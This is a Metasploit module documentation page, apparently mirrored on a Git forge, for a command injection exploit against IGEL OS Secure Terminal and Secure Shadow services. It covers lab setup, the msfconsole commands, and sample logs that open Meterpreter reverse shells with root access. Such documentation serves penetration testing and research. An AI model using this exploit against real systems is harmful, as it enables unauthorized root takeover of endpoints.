adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
748ff19ef4233431624d4fca75ee1f03a7d53fdd
metasploit-gs/documentation/modules/exploit/linux/misc/igel_command_injection.md
T
Rob V 748ff19ef4 attempt to please linting
2021-03-25 16:11:43 -04:00

4.7 KiB
Raw Blame History

Vulnerable Application

IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a system() call via Secure Terminal and Secure Shadow services.

This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability. After exploitation these changes are reverted.

Secure Terminal/telnet_ssl_connector: 30022/tcp Secure Shadow/vnc_ssl_connector: 5900/tcp

Verification Steps

Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware, reboot when prompted

After rebooted work through the presented configuration wizard. In the Activation section use the starter license (selected by default). Skip the ICG Agent Setup. Upon completion the system will reboot again.

Turn on vulnerable services

  1. Click on the launcher menu
  2. Click on the gear icon
  3. Select "Setup" from the Application menu to launch the Setup app
  4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow. Ensure "Allow remote shadowing" and "Secure mode" are checked.
  5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.

Exploitation

  1. start msfconsole
  2. use exploit/linux/misc/igel_command_injection
  3. set RHOST [TARGET IP]
  4. set RPORT [30022 or 5900]
  5. set LHOST [LOCAL IP]
  6. exploit

Misc

To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details". A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500.

Options

Scenarios

IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
RHOST => 192.168.120.224
msf6 exploit(linux/misc/igel_command_injection) > check
[*] 192.168.120.224:30022 - The target appears to be vulnerable.
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
[*] Sending stage (39324 bytes) to 192.168.120.224
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket

meterpreter > getuid
Server username: root
meterpreter >

IGEL OS 10.05.500

Targeting the Secure Shadowing service (5900/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
RHOST => 192.168.120.226
msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
RPORT => 5900
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
[*] Sending stage (39328 bytes) to 192.168.120.226
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400

meterpreter > getuid
Server username: root
meterpreter >
Reference in New Issue View Git Blame Copy Permalink